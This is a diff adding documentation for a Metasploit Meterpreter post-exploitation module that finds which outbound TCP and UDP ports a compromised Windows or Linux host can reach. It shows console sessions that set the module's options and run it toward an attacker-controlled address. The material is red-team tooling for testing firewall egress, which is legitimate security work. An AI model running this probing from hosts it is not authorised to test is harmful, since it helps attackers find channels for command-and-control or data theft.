|
| 1 | +This is a Meterpreter post exploitation module that will generate TCP and UDP packets on a range of ports and send them to a provided IP address. The primary purpose of this is for 'egress busting' and provides a rapid method of generating legitimate TCP or UDP traffic on each port. This is useful for red-teaming type exercises in which you have meterpreter running on a host but wish to determine additional ports over which egress traffic is permitted. |
| 2 | + |
| 3 | +It can generate the packets in two different ways; it can call the Windows sockets API (using railgun for Windows clients) or it can create the packets using Rex. |
| 4 | + |
| 5 | +NATIVE mode uses Rex sockets to generate traffic. |
| 6 | +WINAPI mode uses Winsock APIs to generate traffic. |
| 7 | + |
| 8 | +As it currently stands, the user will need to set up a listener/tcpdump/wireshark to determine the ports that are open. My [egresscheck-framework](https://github.com/stufus/egresscheck-framework ) code can help with that, but any listener would be fine. |
| 9 | + |
| 10 | +# Example - Windows Meterpreter |
| 11 | + |
| 12 | +Scenario is: |
| 13 | + |
| 14 | +* The victim host is 192.0.2.104 |
| 15 | +* The attacker is 192.0.2.1 |
| 16 | +* The attacker wishes to generate TCP packets to 192.0.2.1 (with meterpreter on 192.0.2.104) on ports 22,23,53,80,88,443 and 445 to see if any of the packets reach 192.0.2.1. Note that the attacker has control of 192.0.2.1. |
| 17 | +* The compromised machine is a Windows 8.1 machine |
| 18 | + |
| 19 | +``` |
| 20 | +msf> sessions -l |
| 21 | +
|
| 22 | +Active sessions |
| 23 | +=============== |
| 24 | +
|
| 25 | + Id Type Information Connection |
| 26 | + -- ---- ----------- ---------- |
| 27 | + 2 meterpreter x86/win32 TESTER\Stuart @ TESTER 192.0.2.1:9877 -> 192.0.2.104:43595 (192.0.2.104) |
| 28 | +
|
| 29 | +msf> set METHOD NATIVE |
| 30 | +METHOD => NATIVE |
| 31 | +msf> set PORTS 22,23,53,80,88,443,445 |
| 32 | +PORTS => 22,23,53,80,88,443,445 |
| 33 | +msf> set PROTOCOL TCP |
| 34 | +PROTOCOL => TCP |
| 35 | +msf> set SESSION 2 |
| 36 | +SESSION => 2 |
| 37 | +msf> set TARGET 192.0.2.1 |
| 38 | +TARGET => 192.0.2.1 |
| 39 | +msf> set THREADS 3 |
| 40 | +THREADS => 3 |
| 41 | +msf> show options |
| 42 | +
|
| 43 | +Module options (post/multi/manage/multiport_egress_traffic): |
| 44 | +
|
| 45 | + Name Current Setting Required Description |
| 46 | + ---- --------------- -------- ----------- |
| 47 | + METHOD NATIVE yes The mechanism by which the packets are generated. Can be NATIVE or WINAPI (Windows only). (Accepted: NATIVE, WINAPI) |
| 48 | + PORTS 22,23,53,80,88,443,445 yes Ports to test. |
| 49 | + PROTOCOL TCP yes Protocol to use. (Accepted: TCP, UDP) |
| 50 | + SESSION 2 yes The session to run this module on. |
| 51 | + TARGET 192.0.2.1 yes Destination IP address. |
| 52 | + THREADS 3 yes Number of simultaneous threads/connections to try. |
| 53 | +
|
| 54 | +msf> run |
| 55 | +[*] Generating TCP traffic to 192.0.2.1... |
| 56 | +[*] TCP traffic generation to 192.0.2.1 completed. |
| 57 | +[*] Post module execution completed |
| 58 | +msf> set VERBOSE TRUE |
| 59 | +VERBOSE => TRUE |
| 60 | +msf> run |
| 61 | +[*] Number of threads: 3. |
| 62 | +[*] Generating TCP traffic to 192.0.2.1... |
| 63 | +[*] [1:NATIVE] Connecting to 192.0.2.1 port TCP/23 |
| 64 | +[*] [2:NATIVE] Connecting to 192.0.2.1 port TCP/53 |
| 65 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/22 |
| 66 | +[*] [2:NATIVE] Error connecting to 192.0.2.1 TCP/53 |
| 67 | +[*] [1:NATIVE] Error connecting to 192.0.2.1 TCP/23 |
| 68 | +[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/22 |
| 69 | +[*] [1:NATIVE] Connecting to 192.0.2.1 port TCP/88 |
| 70 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/80 |
| 71 | +[*] [2:NATIVE] Connecting to 192.0.2.1 port TCP/443 |
| 72 | +[*] [1:NATIVE] Error connecting to 192.0.2.1 TCP/88 |
| 73 | +[*] [2:NATIVE] Error connecting to 192.0.2.1 TCP/443 |
| 74 | +[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/80 |
| 75 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/445 |
| 76 | +[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/445 |
| 77 | +[*] TCP traffic generation to 192.0.2.1 completed. |
| 78 | +[*] Post module execution completed |
| 79 | +``` |
| 80 | + |
| 81 | +Here is an example with the METHOD parameter set to WINAPI: |
| 82 | + |
| 83 | +``` |
| 84 | +msf> set METHOD WINAPI |
| 85 | +METHOD => WINAPI |
| 86 | +msf> run |
| 87 | +
|
| 88 | +[*] Number of threads: 3. |
| 89 | +[*] Generating TCP traffic to 192.0.2.1... |
| 90 | +[*] [2:WINAPI] Set up socket for 192.0.2.1 port TCP/53 (Handle: 14908) |
| 91 | +[*] [1:WINAPI] Set up socket for 192.0.2.1 port TCP/23 (Handle: 14856) |
| 92 | +[*] [2:WINAPI] Connecting to 192.0.2.1:TCP/53 |
| 93 | +[*] [1:WINAPI] Connecting to 192.0.2.1:TCP/23 |
| 94 | +[*] [0:WINAPI] Set up socket for 192.0.2.1 port TCP/22 (Handle: 14300) |
| 95 | +[*] [0:WINAPI] Connecting to 192.0.2.1:TCP/22 |
| 96 | +[*] [2:WINAPI] There was an error sending a connect packet for TCP socket (port 53) Error: 10061 |
| 97 | +[*] [0:WINAPI] There was an error sending a connect packet for TCP socket (port 22) Error: 10061 |
| 98 | +[*] [1:WINAPI] There was an error sending a connect packet for TCP socket (port 23) Error: 10061 |
| 99 | +[*] [1:WINAPI] Set up socket for 192.0.2.1 port TCP/88 (Handle: 13868) |
| 100 | +[*] [0:WINAPI] Set up socket for 192.0.2.1 port TCP/80 (Handle: 14300) |
| 101 | +[*] [1:WINAPI] Connecting to 192.0.2.1:TCP/88 |
| 102 | +[*] [2:WINAPI] Set up socket for 192.0.2.1 port TCP/443 (Handle: 14908) |
| 103 | +[*] [0:WINAPI] Connecting to 192.0.2.1:TCP/80 |
| 104 | +[*] [2:WINAPI] Connecting to 192.0.2.1:TCP/443 |
| 105 | +[*] [1:WINAPI] There was an error sending a connect packet for TCP socket (port 88) Error: 10061 |
| 106 | +[*] [2:WINAPI] There was an error sending a connect packet for TCP socket (port 443) Error: 10061 |
| 107 | +[*] [0:WINAPI] There was an error sending a connect packet for TCP socket (port 80) Error: 10061 |
| 108 | +[*] [0:WINAPI] Set up socket for 192.0.2.1 port TCP/445 (Handle: 13868) |
| 109 | +[*] [0:WINAPI] Connecting to 192.0.2.1:TCP/445 |
| 110 | +[*] [0:WINAPI] There was an error sending a connect packet for TCP socket (port 445) Error: 10061 |
| 111 | +[*] TCP traffic generation to 192.0.2.1 completed. |
| 112 | +[*] Post module execution completed |
| 113 | +``` |
| 114 | + |
| 115 | +UDP also works correctly: |
| 116 | + |
| 117 | +``` |
| 118 | +msf> set PROTOCOL UDP |
| 119 | +PROTOCOL => UDP |
| 120 | +msf> set METHOD NATIVE |
| 121 | +METHOD => NATIVE |
| 122 | +msf> show options |
| 123 | +
|
| 124 | +Module options (post/multi/manage/multiport_egress_traffic): |
| 125 | +
|
| 126 | + Name Current Setting Required Description |
| 127 | + ---- --------------- -------- ----------- |
| 128 | + METHOD NATIVE yes The mechanism by which the packets are generated. Can be NATIVE or WINAPI (Windows only). (Accepted: NATIVE, WINAPI) |
| 129 | + PORTS 22,23,53,80,88,443,445 yes Ports to test. |
| 130 | + PROTOCOL UDP yes Protocol to use. (Accepted: TCP, UDP) |
| 131 | + SESSION 2 yes The session to run this module on. |
| 132 | + TARGET 192.0.2.1 yes Destination IP address. |
| 133 | + THREADS 3 yes Number of simultaneous threads/connections to try. |
| 134 | +
|
| 135 | +msf> run |
| 136 | +
|
| 137 | +[*] Number of threads: 3. |
| 138 | +[*] Generating UDP traffic to 192.0.2.1... |
| 139 | +[*] [1:NATIVE] Connecting to 192.0.2.1 port UDP/23 |
| 140 | +[*] [2:NATIVE] Connecting to 192.0.2.1 port UDP/53 |
| 141 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/22 |
| 142 | +[*] [2:NATIVE] Connecting to 192.0.2.1 port UDP/443 |
| 143 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/80 |
| 144 | +[*] [1:NATIVE] Connecting to 192.0.2.1 port UDP/88 |
| 145 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/445 |
| 146 | +[*] UDP traffic generation to 192.0.2.1 completed. |
| 147 | +[*] Post module execution completed |
| 148 | +``` |
| 149 | + |
| 150 | +Note that the errors showing in verbose mode are normal; this is because there is nothing actually listening on any of those ports, meaning that the calls will fail. |
| 151 | + |
| 152 | +Running tcpdump on 192.0.2.1 showed all the connection attempts as normal. |
| 153 | + |
| 154 | +# Example - Linux Meterpreter |
| 155 | + |
| 156 | +Scenario is: |
| 157 | + |
| 158 | +* The victim host is 192.0.2.103 |
| 159 | +* The attacker is 192.0.2.1 |
| 160 | +* The attacker wishes to generate TCP packets to 192.0.2.1 (with linux meterpreter on 192.0.2.103) on ports 22,23,53,80,88,443 and 445 to see if any of the packets reach 192.0.2.1. Note that the attacker has control of 192.0.2.1. |
| 161 | +* The compromised machine is a Linux machine (running Kali) |
| 162 | + |
| 163 | +``` |
| 164 | +msf> sessions -l |
| 165 | +
|
| 166 | +Active sessions |
| 167 | +=============== |
| 168 | +
|
| 169 | + Id Type Information Connection |
| 170 | + -- ---- ----------- ---------- |
| 171 | + 4 meterpreter x86/linux uid=1000, gid=1001, euid=1000, egid=1001, suid=1000, sgid=1001 @ kali 192.0.2.1:4322 -> 192.0.2.103:37489 (192.0.2.103) |
| 172 | +
|
| 173 | +msf> run |
| 174 | +[*] Number of threads: 3. |
| 175 | +[*] Generating TCP traffic to 192.0.2.1... |
| 176 | +[*] [1:NATIVE] Connecting to 192.0.2.1 port TCP/23 |
| 177 | +[*] [2:NATIVE] Connecting to 192.0.2.1 port TCP/53 |
| 178 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/22 |
| 179 | +[*] [1:NATIVE] Error connecting to 192.0.2.1 TCP/23 |
| 180 | +[*] [1:NATIVE] Connecting to 192.0.2.1 port TCP/88 |
| 181 | +[*] [2:NATIVE] Error connecting to 192.0.2.1 TCP/53 |
| 182 | +[*] [2:NATIVE] Connecting to 192.0.2.1 port TCP/443 |
| 183 | +[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/22 |
| 184 | +[*] [1:NATIVE] Error connecting to 192.0.2.1 TCP/88 |
| 185 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/80 |
| 186 | +[*] [2:NATIVE] Error connecting to 192.0.2.1 TCP/443 |
| 187 | +[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/80 |
| 188 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/445 |
| 189 | +[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/445 |
| 190 | +[*] TCP traffic generation to 192.0.2.1 completed. |
| 191 | +[*] Post module execution completed |
| 192 | +msf> set PROTOCOL UDP |
| 193 | +PROTOCOL => UDP |
| 194 | +msf> run |
| 195 | +[*] Number of threads: 3. |
| 196 | +[*] Generating UDP traffic to 192.0.2.1... |
| 197 | +[*] [1:NATIVE] Connecting to 192.0.2.1 port UDP/23 |
| 198 | +[*] [2:NATIVE] Connecting to 192.0.2.1 port UDP/53 |
| 199 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/22 |
| 200 | +[*] [2:NATIVE] Connecting to 192.0.2.1 port UDP/443 |
| 201 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/80 |
| 202 | +[*] [1:NATIVE] Connecting to 192.0.2.1 port UDP/88 |
| 203 | +[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/445 |
| 204 | +[*] UDP traffic generation to 192.0.2.1 completed. |
| 205 | +[*] Post module execution completed |
| 206 | +msf> show options |
| 207 | +
|
| 208 | +Module options (post/multi/manage/multiport_egress_traffic): |
| 209 | +
|
| 210 | + Name Current Setting Required Description |
| 211 | + ---- --------------- -------- ----------- |
| 212 | + METHOD NATIVE yes The mechanism by which the packets are generated. Can be NATIVE or WINAPI (Windows only). (Accepted: NATIVE, WINAPI) |
| 213 | + PORTS 22,23,53,80,88,443,445 yes Ports to test. |
| 214 | + PROTOCOL UDP yes Protocol to use. (Accepted: TCP, UDP) |
| 215 | + SESSION 4 yes The session to run this module on. |
| 216 | + TARGET 192.0.2.1 yes Destination IP address. |
| 217 | + THREADS 3 yes Number of simultaneous threads/connections to try. |
| 218 | +
|
| 219 | +msf> |
| 220 | +``` |
| 221 | + |
| 222 | + |
| 223 | + |
| 224 | +# Future Work |
| 225 | + |
| 226 | +This module did not appear to work on python meterpreter. |
0 commit comments